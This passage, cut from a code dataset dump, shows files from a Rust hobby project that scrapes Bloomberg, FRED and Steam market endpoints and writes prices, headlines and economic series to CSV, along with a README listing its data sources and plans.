"5cc56e32cc87469e837c74c90bf4a094c7c81b9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 18446, "license_type": "no_license", "max_line_length": 228, "num_lines": 469, "path": "/finox/src/news/bloomberg.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate csv;\nextern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\nuse crate::news;\n/*\ntodo\nfn dash() -> Result<(), reqwest::Error> {\nlet symbs = vec![\"commodities\", \"futures\", \"asia\", \"americas\", \"europe\"];\nlet dashboard_root = \"https://www.bloomberg.com/markets/api/data-dashboard/tileset/\";\nhttps://www.bloomberg.com/markets2/api/report/income/EQT/MSFT%3AUS/annual?locale=en&currency=USD\nhttps://www.bloomberg.com/markets/api/security/currency/cross-rates/USD,EUR\nhttps://www.bloomberg.com/markets2/api/people/2029055\nhttps://www.bloomberg.com/markets2/api/peopleForCompany/101743\nhttps://www.bloomberg.com/markets/api/sectors/S5INFT%3AIND?locale=en\nhttps://www.bloomberg.com/markets2/api/history/MSFT%3AUS/PX_LAST?timeframe=5_YEAR&period=daily&volumePeriod=daily\nhttps://www.bloomberg.com/markets2/api/history/CL1%3ACOM/PX_LAST?timeframe=5_YEAR&period=daily&volumePeriod=daily\nhttps://www.bloomberg.com/markets/api/comparison/news?securityType=GOVERNMENT_BOND&limit=1000&locale=en\nanotha SP1:IND,DM1:IND,SX5E:IND,UKX:IND,DAX:IND,NKY:IND,SHCOMP:IND,SPX:IND,RTY:IND,DXY:CUR,USDJPY:CUR,EURUSD:CUR,XAU:CUR,USGG10YR:IND,USGG2YR:IND,LEGATRUU:IND,CL1:COM,CO1:COM\nhttps://www.bloomberg.com/bbg-gfx/bgreen-widget-data/dashboard-data.json\nhttps://oec.world/en/profile/country/arg/\nhttps://api.nasdaq.com/api/quote/watchlist?symbol=cl%3anmx%7ccommodities&symbol=ho%3anmx%7ccommodities&symbol=rb%3anmx%7ccommodities&symbol=ng%3anmx%7ccommodities&symbol=bz%3anmx%7ccommodities&symbol=eh%7ccommodities\nhttps://www.bloomberg.com/markets/api/security/currency/cross-rates/USD,EUR,XAU,XAG,XPT,XPD,JPY,GBP,AUD,CAD,CHF,KRW,MXN,BRL,CLP,COP,PEN,CRC,ARS,SEK,DKK,NOK,CZK,SKK,PLN,HUF,RUB,TRY,ILS,KES,ZAR,MAD,NZD,PHP,SGD,IDR,CNY,INR,MYR,THB,\n}\n*/\n// pub fn currencies_intraday(start: String) -> Result<(), reqwest::Error> {\n// let urls = currency_urls();\n// for url in urls.iter() {\n// if let Some(curs) = 
get_intraday_or_history(url.to_string()) {\n// let prices_fn = format!(\"./data/{}_intraday_prices.csv\", url.to_string());\n// if let Ok(recs) = Intraday::price_records(&curs[0]) {\n// utils::writerecs(prices_fn, &[\"date_time\", &curs[0].ticker.to_string()], recs);\n// }\n// } else {\n// println!(\"currency route missing: {}\", url.to_string());\n// continue;\n// }\n// }\n// Ok(())\n// }\n\n// pub fn currencies_history(start: String) -> Result<(), reqwest::Error> {\n// let index = CURRENCY_SYMBOLS\n// .iter()\n// .position(|r| r.to_string() == start.to_string())\n// .unwrap();\n\n// let todo_symbs = &CURRENCY_SYMBOLS[index..CURRENCY_SYMBOLS.len()];\n// for s1 in todo_symbs.iter() {\n// for s2 in CURRENCY_SYMBOLS.iter() {\n// if s1 == s2 {\n// continue;\n// }\n// let symb = format!(\"{}{}%3ACUR\", s1.to_string(), s2.to_string());\n// if let Some(curs) = get_history(symb.to_string()) {\n// let prices_fn = format!(\"./data/{}_history_prices.csv\", symb.to_string());\n// if let Ok(recs) = Intraday::price_records(&curs[0]) {\n// utils::writerecs(prices_fn, &[\"date_time\", &curs[0].ticker.to_string()], recs);\n// }\n// } else {\n// println!(\"currency route missing: {}\", symb.to_string());\n// continue;\n// }\n// }\n// }\n// Ok(())\n// }\n\n// pub fn commodities_prices(start: String) -> Result<(), reqwest::Error> {\n// let index = COMMODITIES_SYMBOLS\n// .iter()\n// .position(|r| r.to_string() == start.to_string())\n// .unwrap();\n\n// let todo_symbs = &COMMODITIES_SYMBOLS[index..COMMODITIES_SYMBOLS.len()];\n// for s in todo_symbs.iter() {\n// if let Some(hist) = get_history(format!(\"{}%3ACOM\", s.to_string())) {\n// if let Ok(prices) = Intraday::price_records(&hist[0]) {\n// let prices_fn = format!(\"./data/{}_prices.csv\", s.to_string());\n// let price_col = format!(\"{}_price\", &s.to_string());\n// utils::writerecs(prices_fn, &[\"date_time\", &price_col], prices);\n// }\n// if let Ok(volume) = Intraday::volume_records(&hist[0]) {\n// let volume_fn = format!(\"./data/{}_volume.csv\", s.to_string());\n// let vol_col = format!(\"{}_volume\", &s.to_string());\n// utils::writerecs(volume_fn, &[\"date_time\", &vol_col], volume);\n// }\n// }\n// }\n// Ok(())\n// }\n\n// pub fn commodities_intraday() -> Result<(), reqwest::Error> {\n// // let index = COMMODITIES_SYMBOLS\n// // .iter()\n// // .position(|r| r.to_string() == start.to_string())\n// // .unwrap();\n\n// // let todo_symbs = &COMMODITIES_SYMBOLS[index..COMMODITIES_SYMBOLS.len()];\n// for s in COMMODITIES_SYMBOLS.iter() {\n// if let Some(hist) = get_history(format!(\"{}%3ACOM\", s.to_string())) {\n// if let Ok(prices) = Intraday::price_records(&hist[0]) {\n// let prices_fn = format!(\"./data/{}_intraday_prices.csv\", s.to_string());\n// let price_col = format!(\"{}_price\", &s.to_string());\n// utils::writerecs(prices_fn, &[\"date_time\", &price_col], prices);\n// }\n// if let Ok(volume) = Intraday::volume_records(&hist[0]) {\n// let volume_fn = format!(\"./data/{}_intraday_volume.csv\", s.to_string());\n// let vol_col = format!(\"{}_volume\", &s.to_string());\n// utils::writerecs(volume_fn, &[\"date_time\", &vol_col], volume);\n// }\n// }\n// }\n// Ok(())\n// }\n\npub const PRICE_HEADER: [&'static str; 2] = [\"date_time\", \"price\"];\npub const NEWS_HEADER: [&'static str; 3] = [\"url\", \"headline\", \"date_time\"];\npub const HEADLINES_HEADER: [&'static str; 4] = [\"id\", \"url\", \"headline\", \"lastmod\"];\n\npub fn news() -> Result<(), csv::Error> {\n let write_fn = \"./ref_data/news.csv\";\n let mut wtr = 
csv::Writer::from_path(&write_fn)?;\n wtr.write_record(&NEWS_HEADER);\n for s in headers::NEWS_SYMBOLS.iter() {\n if let Some(news_vec) = get_news(s.to_string()) {\n if let Ok(recs) = news::NewsVec::to_records(&news_vec) {\n for r in recs.iter() {\n wtr.write_record(r);\n }\n }\n }\n }\n wtr.flush();\n\n Ok(())\n}\n\npub fn sp500(start: String, write_header: bool) -> Result<(), csv::Error> {\n let symbs = roses::read_tickers(\"./ref_data/sp500tickers.txt\");\n let index = symbs\n .iter()\n .position(|r| r.to_string() == start.to_string())\n .unwrap();\n\n let todo_symbs = &symbs[index..symbs.len()];\n\n let headlines_fn = \"../ref_data/sp500_headlines.csv\".to_string();\n let mut lines_wtr = csv::Writer::from_path(&headlines_fn)?;\n lines_wtr.write_record(&HEADLINES_HEADER);\n for s in todo_symbs.iter() {\n let symb = format!(\"{}%3AUS\", s.to_string());\n if let Some(c) = get_datastrip(symb.to_string()) {\n if let Ok(headlines) = Root::to_headlines(&c[0]) {\n for r in headlines.iter() {\n lines_wtr.write_record(r);\n }\n }\n }\n }\n lines_wtr.flush();\n Ok(())\n}\n\n// pub fn stock_prices(start: String) -> Result<(), reqwest::Error> {\n// let symbs = utils::read_tickers(\"./data/sp500tickers.txt\");\n// let index = symbs\n// .iter()\n// .position(|r| r.to_string() == start.to_string())\n// .unwrap();\n\n// let todo_symbs = &symbs[index..symbs.len()];\n// for s in todo_symbs.iter() {\n// if let Some(hist) = get_history(format!(\"{}%3AUS\", s.to_string())) {\n// if let Ok(recs) = Intraday::price_records(&hist[0]) {\n// let write_fn = format!(\"./data/{}_stock_history_price.csv\", s.to_string());\n// let price_col = format!(\"{}_price\", &s.to_string());\n// utils::writerecs(write_fn, &[\"date_time\", &price_col], recs);\n// }\n// if let Ok(recs) = Intraday::volume_records(&hist[0]) {\n// let write_fn = format!(\"./data/{}_stock_history_vol.csv\", s.to_string());\n// let vol_col = format!(\"{}_volume\", &s.to_string());\n// utils::writerecs(write_fn, &[\"date_time\", &vol_col], recs);\n// }\n// }\n// }\n// Ok(())\n// }\n// pub fn stock_intraday(start: String) -> Result<(), reqwest::Error> {\n// let symbs = utils::read_tickers(\"./data/sp500tickers.txt\");\n// let index = symbs\n// .iter()\n// .position(|r| r.to_string() == start.to_string())\n// .unwrap();\n\n// let todo_symbs = &symbs[index..symbs.len()];\n// for s in todo_symbs.iter() {\n// let symb = format!(\"{}%3AUS\", s.to_string());\n// if let Some(hist) = get_intraday_or_history(symb.to_string()) {\n// if let Ok(recs) = Intraday::price_records(&hist[0]) {\n// let write_fn = format!(\"./data/{}_stock_intraday_price.csv\", s.to_string());\n// let price_col = format!(\"{}_price\", &s.to_string());\n// utils::writerecs(write_fn, &[\"date_time\", &price_col], recs);\n// }\n// if let Ok(recs) = Intraday::volume_records(&hist[0]) {\n// let write_fn = format!(\"./data/{}_stock_intraday_vol.csv\", s.to_string());\n// let vol_col = format!(\"{}_volume\", &s.to_string());\n// utils::writerecs(write_fn, &[\"date_time\", &vol_col], recs);\n// }\n// }\n// }\n// Ok(())\n// }\n\npub fn currency_urls() -> Vec<String> {\n let mut urls: Vec<String> = Vec::new();\n for s1 in headers::BLOOMBERG_CURRENCY_SYMBOLS.iter() {\n for s2 in headers::BLOOMBERG_CURRENCY_SYMBOLS.iter() {\n if s1 == s2 {\n continue;\n }\n let symb = format!(\"{}{}:CUR\", s1.to_string(), s2.to_string());\n\n urls.push(bloomberg_url(utils::Security::X(symb)));\n }\n }\n return urls;\n}\n\npub fn us_tickers() -> Vec<String> {\n let urls = 
utils::read_tickers(\"./ref_data/tickers.txt\")\n .iter()\n .map(|x| bloomberg_url(utils::Security::US(format!(\"{}:US\", x))))\n .collect();\n println!(\"{:#?}\", urls);\n return urls;\n}\n\npub fn bloomberg_url(s: utils::Security) -> String {\n let root = \"https://www.bloomberg.com/\";\n\n let intra_prefix = \"markets2/api/intraday/\";\n let intra_sfx = \"?days=10&interval=0&volumeInterval=0\";\n\n // https://www.bloomberg.com/markets2/api/intraday/USDJPY%3ACUR?days=10&interval=0&volumeInterval=0\n // let hist_prefix = \"markets2/api/history/\";\n // \"&limit=1000\"\n // let news_prefix\"/markets/api/comparison/news?securityType=\"\n // let news_sfx \"/PX_LAST?timeframe=5_YEAR&period=daily&volumePeriod=daily\"\n\n match s {\n utils::Security::F(s) => vec![root, intra_prefix, &s, intra_sfx].join(\"\"),\n utils::Security::X(s) => vec![root, intra_prefix, &s, intra_sfx].join(\"\"),\n utils::Security::US(s) => vec![root, intra_prefix, &s, intra_sfx].join(\"\"),\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Root {\n pub average_days_to_maturity: ::serde_json::Value,\n pub average_volume30_day: ::serde_json::Value,\n pub back_load_fee: ::serde_json::Value,\n pub bbid: String,\n pub bics_industry: String,\n pub bics_sector: String,\n pub bics_sub_industry: String,\n pub co_fund_manager: ::serde_json::Value,\n pub company_address: String,\n pub company_description: String,\n pub company_is_private: bool,\n pub company_phone: ::serde_json::Value,\n pub company_website: ::serde_json::Value,\n pub current_management_fee: ::serde_json::Value,\n pub dividend: ::serde_json::Value,\n pub earnings_announcement: ::serde_json::Value,\n pub earnings_per_share: ::serde_json::Value,\n pub price_earnings_to_growth_and_dividend_yield_ratio: ::serde_json::Value,\n pub expense_ratio: ::serde_json::Value,\n pub founded_year: ::serde_json::Value,\n pub front_load_fee: ::serde_json::Value,\n pub fundamental_data_currency: String,\n pub fund_asset_class_focus: ::serde_json::Value,\n pub fund_geographic_focus: ::serde_json::Value,\n pub fund_manager: ::serde_json::Value,\n pub fund_marketing_fee: ::serde_json::Value,\n pub fund_objective: ::serde_json::Value,\n pub fund_type: ::serde_json::Value,\n pub gics_industry: i64,\n pub gics_sector: i64,\n pub high_price: f64,\n pub high_price52_week: f64,\n pub id: String,\n pub inception_date: ::serde_json::Value,\n pub index_description: ::serde_json::Value,\n pub index_source: ::serde_json::Value,\n pub indicated_gross_dividend_yield: ::serde_json::Value,\n pub is_open: bool,\n pub issued_currency: String,\n pub last_announcement_period: String,\n pub last_dividend_reported: ::serde_json::Value,\n pub last_update: String,\n pub long_name: String,\n pub low_price: f64,\n pub low_price52_week: f64,\n pub market_cap: f64,\n pub market_status: String,\n pub media_security_type: String,\n pub media_security_subtype: String,\n pub name: String,\n pub net_asset_value: ::serde_json::Value,\n pub net_asset_value_date: ::serde_json::Value,\n pub next_earnings_announcement: ::serde_json::Value,\n pub next_earnings_period: ::serde_json::Value,\n pub next_earnings_period_end: ::serde_json::Value,\n pub number_of_employees: ::serde_json::Value,\n pub open_price: f64,\n pub parent_ticker: String,\n pub percent_premium: ::serde_json::Value,\n pub percent_premium52_week_average: ::serde_json::Value,\n pub percent_change1_day: f64,\n pub periodicity: ::serde_json::Value,\n pub 
previous_closing_price_one_trading_day_ago: f64,\n    pub price: f64,\n    pub price_change1_day: f64,\n    pub price_earnings_ratio: ::serde_json::Value,\n    pub price_min_decimals: i64,\n    pub price_to_book_ratio: ::serde_json::Value,\n    pub price_to_sales_ratio: ::serde_json::Value,\n    pub primary_exchange: String,\n    pub redemption_fee: ::serde_json::Value,\n    pub score: ::serde_json::Value,\n    pub security_name: ::serde_json::Value,\n    pub share_class: ::serde_json::Value,\n    pub shares_outstanding: i64,\n    pub short_name: String,\n    pub time_zone_offset: i64,\n    pub total_assets: ::serde_json::Value,\n    pub total_assets_date: ::serde_json::Value,\n    pub total_assets_currency: ::serde_json::Value,\n    pub total_return1_year: ::serde_json::Value,\n    pub total_return3_month: ::serde_json::Value,\n    pub total_return3_year: ::serde_json::Value,\n    pub total_return5_year: ::serde_json::Value,\n    pub total_return_ytd: ::serde_json::Value,\n    pub trading_day_close: String,\n    #[serde(rename = \"type\")]\n    pub type_field: String,\n    pub ultimate_parent_ticker: String,\n    pub volume: i64,\n    pub press_releases: Option<Vec<PressRelease>>,\n}\n\nimpl Root {\n    pub fn to_rec(&self) -> Vec<String> {\n        vec![\n            self.id.to_string(),\n            self.short_name.to_string(),\n            self.market_cap.to_string(),\n            self.company_phone.to_string(),\n            self.last_update.to_string(),\n            self.average_volume30_day.to_string(),\n            self.price.to_string(),\n            self.open_price.to_string(),\n            self.high_price.to_string(),\n            self.low_price.to_string(),\n            self.low_price52_week.to_string(),\n            self.high_price52_week.to_string(),\n            self.number_of_employees.to_string(),\n            self.price_earnings_ratio.to_string(),\n            self.shares_outstanding.to_string(),\n        ]\n    }\n\n    pub fn to_headlines(&self) -> Result<Vec<csv::StringRecord>, &'static str> {\n        let mut ret: Vec<csv::StringRecord> = Vec::new();\n        if let Some(prs) = &self.press_releases {\n            for pr in prs.iter() {\n                ret.push(pr.to_rec());\n            }\n            Ok(ret)\n        } else {\n            Err(\"no headlines most likely\")\n        }\n    }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct PressRelease {\n    pub id: String,\n    pub url: String,\n    pub headline: Headline,\n    pub updated_at: String,\n}\n\nimpl PressRelease {\n    pub fn to_rec(&self) -> Vec<String> {\n        vec![\n            self.id.to_string(),\n            self.url.to_string(),\n            // Headline has no Display impl; record its text field directly\n            self.headline.text.to_string(),\n            self.updated_at.to_string(),\n        ]\n    }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Headline {\n    pub text: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Intraday {\n    // #[serde(flatten)]\n    pub ticker: String,\n    pub previous_closing_price_one_trading_day_ago: ::serde_json::Value,\n    pub open_price: ::serde_json::Value,\n    pub range: Option<Range>,\n    pub price: Vec<Price>,\n    pub volume: Vec<Volume>,\n}\n\nimpl crate::HasRecs for Intraday {\n    fn to_recs(&self) -> Vec<Vec<String>> {\n        self.price.iter().map(|x| x.to_rec()).collect()\n    }\n}\n\nimpl Intraday {\n    pub fn volume_records(&self) -> Vec<Vec<String>> {\n        let mut ret = vec![];\n        for i in 0..self.volume.len() {\n            ret.push(vec![\n                self.volume[i].date_time.to_string(),\n                self.volume[i].value.to_string(),\n            ]);\n        }\n        ret\n    }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub 
struct Range {\n pub start: String,\n pub end: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Price {\n pub date_time: String,\n pub value: f64,\n}\n\nimpl Price {\n pub fn to_rec(&self) -> Vec<String> {\n return vec![self.date_time.to_string(), self.value.to_string()];\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Volume {\n pub date_time: String,\n pub value: i64,\n}\n" }, { "alpha_fraction": 0.5329750776290894, "alphanum_fraction": 0.5417684316635132, "avg_line_length": 28.774545669555664, "blob_id": "9acc14ed810c45c1265d160ea0949538c7b3b777", "content_id": "d4ae6bda485b1a482bf42181be733d405498f11d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 8188, "license_type": "no_license", "max_line_length": 100, "num_lines": 275, "path": "/finox/src/bin/fred.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "//extern crate regex;\nextern crate reqwest;\nextern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\nextern crate tokio;\nextern crate url;\n//use lazy_static::lazy_static;\n//use regex::Regex;\n\nuse finox::keys::FRED_KEYS;\nuse std::{\n collections::HashMap,\n env,\n path::Path,\n //thread,\n //rc::{Rc, Weak},\n time,\n};\nuse url::Url;\n\npub const WRITE_PATH: &str = \"../data/fred/\";\npub const FRED_DELAY: time::Duration = time::Duration::from_secs(10);\n\n//fn extract_id(input: &str) -> Option<&str> {\n// lazy_static! {\n// static ref RE: Regex = Regex::new(r\"id=(?P<id>\\w*)&\").unwrap();\n// }\n// RE.captures(input)\n// .and_then(|cap| cap.name(\"id\").map(|login| login.as_str()))\n//\n//}\n\n#[tokio::main]\nasync fn main() -> Result<(), reqwest::Error> {\n let args: Vec<String> = env::args().collect();\n if args.len() != 2 {\n panic!(\n \"provide 's' or 'o' as second arg, for 'o' you need a fred_series_id.txt in ref_data/\"\n );\n }\n // how do you\n match args[1].as_ref() {\n \"c\" => {\n /*\n * 1. 
for bfs we want\n */\n //let mut cat_ids = vec![];\n let path = \"category/children\";\n let query = \"category_id=\";\n let mut all_recs: Vec<Vec<String>> = vec![];\n\n let depth: usize = 4;\n\n let mut to_visit: Vec<String> = vec![\n \"32991\", \"10\", \"32992\", \"1\", \"32455\", \"32263\", \"3008\", \"33060\",\n ]\n .iter()\n .map(|x| x.to_string())\n .collect();\n for _ in 0..depth {\n //let id = to_visit.pop().unwrap();\n let hm = gen_queries(path, query, to_visit.clone());\n let vals = hm.values().map(|x| x.to_string()).collect::<Vec<String>>();\n if let Ok(recs) = finox::fetch::<CategoryChildrenRoot>(vals.clone()).await {\n all_recs.append(&mut recs.clone());\n to_visit = recs\n .iter()\n .map(|x| x.clone()[0].to_string())\n .collect::<Vec<String>>();\n\n println!(\"recs for category #: {:#?}\", recs.len());\n println!(\"to_visit #: {:#?}\", to_visit.len());\n } else {\n println!(\"{:?}\", vals);\n }\n }\n\n println!(\"all recs: #{}\", all_recs.len());\n finox::roses::write_csv(\n Path::new(\"../data/fred/categories.csv\"),\n all_recs,\n &CATEGORY_HEADER,\n )\n .expect(\"csv prob\");\n }\n\n \"s\" => {\n let ids = finox::roses::read_tickers(\"../ref_data/fred_category_ids.txt\");\n let hm = gen_queries(\"category/series\", \"category_id=\", ids);\n if let Ok(res) =\n finox::fetch_write::<CategoryRoot>(hm, \"../data/fred/series/\", &SERIES_HEADER).await\n {\n println!(\"series Ok #{:#?}\", res.len());\n }\n }\n \"o\" => {\n let ids = finox::roses::read_tickers(\"../ref_data/fred_series_ids.txt\");\n let hm = gen_queries(\"series/observations\", \"series_id=\", ids);\n if let Ok(res) =\n finox::fetch_write::<SeriesObsRoot>(hm, \"../data/fred/observations/\", &OBS_HEADER)\n .await\n {\n println!(\"obs res Ok #{:#?}\", res.len());\n }\n }\n _ => panic!(\"'s' or 'o' for series or observation as 2nd command line arg\"),\n };\n Ok(())\n}\n\nfn gen_queries(path: &str, q: &str, ids: Vec<String>) -> HashMap<String, String>\n//-> Vec<url::Url>\n{\n let mut queries = HashMap::new();\n for (i, id) in ids.iter().enumerate() {\n queries.insert(\n id.to_string(),\n fred_fmt(path, q, id, FRED_KEYS[i % FRED_KEYS.len()]).to_string(),\n );\n //.collect::<Vec<url::Url>>()\n }\n queries\n}\n\nfn fred_fmt(path: &str, query: &str, id: &str, key: &str) -> Url {\n let root = Url::parse(\"https://api.stlouisfed.org\").expect(\"url prob\");\n\n let q = format!(\n \"fred/{}?{}{}&api_key={}&file_type=json\", //&limit=10000\",\n path, query, id, key,\n );\n let url = root.join(&q).expect(\"url parsed wrong\");\n println!(\"{:#?}\", url);\n return url;\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct CategoryRoot {\n pub realtime_start: String,\n pub realtime_end: String,\n pub order_by: String,\n pub sort_order: String,\n pub count: i64,\n pub offset: i64,\n pub limit: i64,\n pub seriess: Vec<Series>,\n}\n\nimpl finox::HasRecs for CategoryRoot {\n fn to_recs(&self) -> Vec<Vec<String>> {\n return self.seriess.iter().map(|x| x.to_rec()).collect::<Vec<_>>();\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct Series {\n pub id: String,\n pub realtime_start: String,\n pub realtime_end: String,\n pub title: String,\n pub observation_start: String,\n pub observation_end: String,\n pub frequency: String,\n pub frequency_short: String,\n pub units: String,\n pub units_short: String,\n pub seasonal_adjustment: String,\n pub seasonal_adjustment_short: String,\n pub last_updated: String,\n pub 
popularity: i64,\n pub group_popularity: i64,\n pub notes: String,\n}\n\nimpl Series {\n fn to_rec(&self) -> Vec<String> {\n return vec![\n self.id.to_string(),\n self.title.to_string(),\n self.observation_start.to_string(),\n self.observation_end.to_string(),\n self.frequency_short.to_string(),\n self.units_short.to_string(),\n self.seasonal_adjustment_short.to_string(),\n self.last_updated.to_string(),\n self.popularity.to_string(),\n self.group_popularity.to_string(),\n self.notes.to_string(), // fix to just grab source code\n ];\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct SeriesObsRoot {\n pub realtime_start: String,\n pub realtime_end: String,\n pub observation_start: String,\n pub observation_end: String,\n pub units: String,\n pub output_type: i64,\n pub file_type: String,\n pub order_by: String,\n pub sort_order: String,\n pub count: i64,\n pub offset: i64,\n pub limit: i64,\n pub observations: Vec<Observation>,\n}\n\nimpl finox::HasRecs for SeriesObsRoot {\n fn to_recs(&self) -> Vec<Vec<String>> {\n return self\n .observations\n .iter()\n .map(|x| x.to_rec())\n .collect::<Vec<_>>();\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct Observation {\n pub realtime_start: String,\n pub realtime_end: String,\n pub date: String,\n pub value: String,\n}\n\nimpl Observation {\n fn to_rec(&self) -> Vec<String> {\n return vec![self.date.to_string(), self.value.to_string()];\n }\n}\n\npub const CATEGORY_HEADER: [&'static str; 2] = [\"id\", \"name\"];\n\npub const OBS_HEADER: [&'static str; 2] = [\"t\", \"x\"];\n\npub const SERIES_HEADER: [&'static str; 11] = [\n \"id\",\n \"title\",\n \"observation_start\",\n \"observation_end\",\n \"frequency_short\",\n \"units_short\",\n \"seasonal_adjustment_short\",\n \"last_updated\",\n \"popularity\",\n \"group_popularity\",\n \"notes\",\n];\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct CategoryChildrenRoot {\n pub categories: Vec<CategoryChild>,\n}\n\nimpl finox::HasRecs for CategoryChildrenRoot {\n fn to_recs(&self) -> Vec<Vec<String>> {\n self.categories.iter().map(|x| x.to_rec()).collect()\n }\n}\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct CategoryChild {\n pub id: i64,\n pub name: String,\n pub parent_id: i64,\n pub notes: Option<String>,\n}\n\nimpl CategoryChild {\n pub fn to_rec(&self) -> Vec<String> {\n vec![self.id.to_string(), self.name.to_string()]\n }\n}\n" }, { "alpha_fraction": 0.756302535533905, "alphanum_fraction": 0.756302535533905, "avg_line_length": 16, "blob_id": "bab3ec7d2ce3a08615e58a7f50126eb78c83623f", "content_id": "3a50023faed202159ab2db2f6410956acefafd71", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 119, "license_type": "no_license", "max_line_length": 21, "num_lines": 7, "path": "/finox/src/nasdaq.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "pub mod chart;\npub mod dividends;\npub mod gen;\npub mod info;\npub mod insiders;\npub mod option_chain;\npub mod realtime;\n" }, { "alpha_fraction": 0.6998313665390015, "alphanum_fraction": 0.7141652703285217, "avg_line_length": 29.35897445678711, "blob_id": "0fbe573d078de5174419432ab7501ac2909f76cb", "content_id": "33e8d87b30acc816dcd619c91ded8de589556d2d", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "Markdown", "length_bytes": 1186, "license_type": "no_license", "max_line_length": 234, "num_lines": 39, "path": "/finox/README.md", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "\n# Docs\n\n## Currently have:\n### Prices\n * yf\n * bloomberg\n * steam trades\n\n### News\n * nyt archive and feed\n * seeking alpha trending\n * wsj videos \n * JPX news \n\n## Todo:\n * remove duplicate code with generic typed functions\n * fred data\n * use a db, noria ideally\n * define schema\n * add logging \n * run on cloud \n * test stability \n * integrate with alpaca\n\n## api todos:\n * Guardian\n * FT\n\n\n### something else\n* using https://xueqiu.com/, seems like its providing public realtime data, \n\n* turns out [yahoo finance data](https://help.yahoo.com/kb/exchanges-data-providers-yahoo-finance-sln2310.html) is mostly 15 mins delayed, which is obviously unacceptable.\n\n* here are two of the nice endpoints they have [last twenty trade prices](https://stock.xueqiu.com/v5/stock/history/trade.json?symbol=FB&count=20) and [realtime price](https://stock.xueqiu.com/v5/stock/realtime/quotec.json?symbol=FB).\n* \n* next data to get is interest and reserve rates, and other fred data like cpi and gdp, which the govt has an api for. \n\n* database https://github.com/mit-pdos/noria running. this is a vid the creator gave at two sigma on noria https://youtu.be/s19G6n0UjsM?t=977.\n\n" }, { "alpha_fraction": 0.6141256093978882, "alphanum_fraction": 0.6229540705680847, "avg_line_length": 30.01230812072754, "blob_id": "906c99860ec95598e8ef25e7e593fdd23a091df4", "content_id": "5543217357ac4d315acd8396c259d171991829a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 10081, "license_type": "no_license", "max_line_length": 105, "num_lines": 325, "path": "/finox/src/misc/steam.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate csv;\nextern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\nuse std::collections::HashMap;\n\n\nuse crate::utils;\n/*\n\nhttps://steamcommunity.com/market/recent?country=US&language=english&currency=1 new listings\nhttps://steamcommunity.com/market/recentcompleted\n\nhttps://steamcommunity.com/market/itemordersactivity?country=US&language=english&currency=1&item_nameid=1\n*/\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Steam {\n pub success: bool,\n pub more: bool,\n #[serde(rename = \"results_html\")]\n pub results_html: ::serde_json::Value,\n pub listinginfo: HashMap<String, Listing>, //Listings\n pub purchaseinfo: Option<HashMap<String, Listing>>, //Purchases\n pub assets: Games,\n pub currency: ::serde_json::Value,\n pub hovers: String,\n #[serde(rename = \"app_data\")]\n pub app_data: AppDatas,\n #[serde(rename = \"last_time\")]\n pub last_time: i64,\n #[serde(rename = \"last_listing\")]\n pub last_listing: String,\n}\n\nimpl Steam {\n pub fn listings(&self) -> Vec<Vec<String>> {\n let mut recs: Vec<Vec<String>> = Vec::new();\n for (k, v) in self.listinginfo.iter() {\n recs.push(Listing::to_record(v));\n } \n return recs;\n }\n pub fn purchases(&self) -> Vec<Vec<String>> {\n let mut recs: Vec<Vec<String>> = Vec::new();\n for (k, v) in self.listinginfo.iter() {\n recs.push(Listing::to_record(v));\n } \n return recs;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, 
